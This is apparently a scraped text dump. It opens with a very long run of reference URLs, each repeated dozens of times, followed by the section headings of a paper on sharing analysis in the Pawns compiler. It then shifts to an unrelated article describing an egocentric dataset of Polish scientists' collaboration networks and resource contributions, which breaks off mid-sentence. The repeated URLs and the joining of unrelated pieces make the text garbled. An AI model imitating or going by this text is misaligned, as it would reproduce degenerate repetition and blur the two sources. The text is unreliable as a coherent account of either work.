http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://dblp.uni-trier.de/db/conf/slp/slp89.html#JacobsL89 http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://www.haskell.org/definition/ http://dx.doi.org/10.1145/143103.143137 http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf http://cs.anu.edu.au/~Ben.Lippmeier/project/thesis/thesis-lippmeier-sub.pdf https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 https://lirias.kuleuven.be/handle/123456789/131659 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 http://dx.doi.org/10.1007/978-3-540-78163-9_17 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 https://lirias.kuleuven.be/handle/123456789/134658 http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dl.acm.org/citation.cfm?id=20952.20977 http://dx.doi.org/10.1007/BF01018828 http://dx.doi.org/10.7717/peerj-cs.22 Sharing analysis in the Pawns compiler Introduction An Overview of Pawns The low level view The high level view Core Pawns The Abstract Domain The Sharing Analysis Algorithm Example Discussion Related Work Conclusion Acknowledgements References work_ddmboglpsndzdb7xkfgsgutgg4 ---- 1© 2020 Authors. This work is licensed under the Creative Commons Attribution 4.0 License (https://creativecommons.org/licenses/by/4.0/). Issue 1 | Vol. 39Article | DOI: 10.21307/connections-2019-010 CONNECTIONS Academic Collaboration via Resource Contributions: An Egocentric Dataset Michał Bojanowski,1,* Dominika Czerniawska2 and Wojciech Fenrich3 1Kozminski University, Warsaw, Poland. 2University of Manchester, Manchester, UK and University of Warsaw, Warsaw, Poland. 3University of Warsaw, Warsaw, Poland. *E-mail: michal2992@gmail.com Abstract In order to understand scientists’ incentives to form collaborative relations, we have conducted a study looking into academically relevant resources, which scientists contribute into collaborations with others. The data we describe in this paper are an egocentric dataset assembled by coding originally qualitative material. It is 40 multiplex ego networks containing data on individual attributes (such as gender, scientific degree), collaboration ties (including alter–alter ties), and resource flows. Resources are coded using a developed inventory of 25 types of academically relevant resources egos and alters contribute into their collaborations. We share the data with the research community with the hopes of enriching knowledge and tools for studying sociological and behavioral aspects of science as a social process. Keywords Collaboration networks, Resources, Sociology of science, Ego networks. Scientometric studies report steadily increasing trend in multi-authored scientific publications. It is clearly an evidence that contemporary science requires cooperation and is not anymore a traditionally individualistic activity (Moody, 2004). The presented data set comes from a study in which our overarching research goal was to understand why some scientists collaborate, but some others do not. In particular, our approach was to think about incentives that might lead them to do so. Inspired by Coleman (1994) and, among others, Laudel (2001), Lewis et al. (2012) as well as our earlier results (Czerniawska et al., 2018), we assume that the incentives to collaborate come from academically relevant resources the scientists possess or control and the interests they might have in resources possessed or controlled by others. For example, a theorist and an experimentalist might be interested in each other’s resources – ability to develop theoretical model of the studied problem and skills in conducting experiments, respectively. Unequal distribution of these resources across academic community and the necessity of pooling them to get ahead in contemporary science results in incentives to collaborate. Current state of knowledge still lacks a universally accepted behavioral understanding of the scientific process, let alone standardized tools for measuring academically relevant resources. Hence, we conducted a qualitative study among Polish scientists with the goal to: 1. collect egocentric data on collaborative relations; 2. develop an inventory of academically relevant resources from respondents’ reports; and 3. measure what resources (Item 2) collaborating parties (ego and alters) engage in their collab- oration ties (Item 1). The data we hereby share are based on transcriptions and coding of the originally qualitative material. The second section provides some brief background information on science in Poland and details our contribution. The presented study involved 40 interviews conducted on a sample of Polish scientists, 2 Academic Collaboration via Resource Contributions: An Egocentric Dataset which we describe further in the third section. In the fourth section, we describe the way in which the inventory of resources was constructed. A complete list with example quotes is provided on the associated website.1 The fifth section describes the structure of the data set. The sixth section provides illustrative examples. The seventh section provides the details where the data can be found and how it can be accessed. Finally, in the eight section, we discuss limitations and potential uses of the data. Background and contribution The presented data come from a study, which was conducted in Poland among Polish researchers. Polish scientific community is among the largest in Europe: according to OECD (2019) statistics, there were 132,000 researchers in Poland in 2016. At the same time, the funding and material resources are only average (cf. Czerniawska, 2018; Kwiek and Szadkowski, 2018). These conditions, next to some others, keep Polish science largely outside of the strict core of international scientific collaboration (Leydesdorff et al., 2013). The organization and institutions of Polish scientific system resemble “Continental” systems (e.g. German scientific system). A typical scientific career requires a four year PhD program, a habilitation which is expected within eight years after a PhD. Obtaining a habilitation is perceived as the final step to becoming an independent scholar. Polish scientific community, similarly to many other scientific communities in Europe, is rather diverse. It is a mix of modern, competitive, internationalized disciplines and groups, and more conservative locally oriented areas (Kwiek, 2018). Explaining the presence or absence of collabo- ration relations among scientists by referring to complementarities between them is not a new idea. For example, Qin et al. (1997) in their bibliometric analysis use institutional affiliation to capture different specialization of scientists. Moody (2004) approximates different types of contributions by analyzing subject codes put on articles indexed by Sociological Abstracts. Our goal was to collect a list of resources they believe are relevant when working as a scientist. We believe a genuine contribution of the presented data set lies in that detailed information on the flow of resources in scientific collaborations. The catalogue, which is a unique contribution in scientific collaboration studies, was constructed based on the extensive literature review and themes mentioned by our interviewees. The data have been used to study whether structurally non-redundant ties are more likely to be characterized with resource contributions not found in other ties (Bojanowski and Czerniawska, 2020). Sample Data come from 40 individual in-depth interviews (IDI) conducted between April and August 2016 by two interviewers. The quota sample consists of 20 female and 20 male scientists from six Polish cities. Respondents represented a broad range of disciplines: natural sciences, social sciences, life sciences, the humanities, engineering, and technology on different levels of career from PhD candidates to professors. The interviewees mentioned 334 collaborators in total. Interviews lasting between 24 and 90 min were recorded and later transcribed. Measurement Each interview consisted of several parts, three of which are of relevance here: 1. Respondents were asked to name up to 10 important researchers they have collaborated with during last five years. Each collaborator was discussed separately giving information about gender, scientific degree, nationality, and university department (if possible). See Section 5.1 below. 2. During the interview a network of collaboration among collaborators mentioned in item (1) was reconstructed using cork board, pins, and rub- ber bands. See the example in Figure 1. Cork boards were photographed and later digitized into edgelist data. See Section 5.2 below. 3. For each collaborator, the respondents were asked about academically relevant resources he/she contributed to the collaboration and what resources were contributed by the col- laborator. Interviewees were provided with a broad framework, which would help them iden- tify resources such as financial resources (e.g. funding), human resources (e.g. knowledge, skills), and social resources (e.g. collaborators). 4. Interviews were audio-recorded and later transcribed. The text of the transcripts was analyzed using QDA Miner Lite2 in order to code 2 A product of Provalis Research, see https://provalisresearch. com/products/qualitative-data-analysis-software/. 1At https://recon-icm.github.io/reconqdata/articles/resource_ inventory.html. 3 CONNECTIONS resources engaged by respondents (the egos) and their collaborators (the alters) to every col- laboration. The coding was performed by two persons. Random sample of the interviews was double-checked by different researchers to ensure reliability. The data are available in table resources and described in detail below. While collaboration networks assembled from part (2) include alter–alter ties, the data on resources from part (3) were acquired for ego-alter dyads only. Structure of the data The data are contained in three inter-related tables diagrammatically presented in Figure 2. Below we describe each table in detail. Node attributes The table nodes contain information about every person in the study – all egos and all alters. It has 374 rows and the following seven variables: • id _ interview – Interview identification number. • id _ node – Person identification number, unique within each interview. • is _ ego – Binary variable equal to 1 if person is the ego (respondent), 0 otherwise. • is _ polish – Binary variable equal to 1 if person is affiliated with a Polish academic in- stitution, 0 otherwise. • department – Marking scientists if they work at the same department. If department is not missing then all scientist within the same inter- view sharing the same value of department work at the same department at the same university. • scidegree – Scientific degree of the scientist. One of “mgr” = MA, “dr” = PhD, “drhab” = habili- tated doctor, or “prof” = full professor. • female – Binary variable equal to 1 if person is female, 0 if male. Pair of variables id _ interview and id _ node together constitutes a key uniquely identifying each row in the nodes table. Collaboration networks The table collaboration is essentially an edge list of collaboration ties. It has 1,732 rows and the following three variables: • id _ interview – Interview identification number. Figure 1: Using cork board, pins, and rubber bands to collect data on collaborations. Small cards contained names or 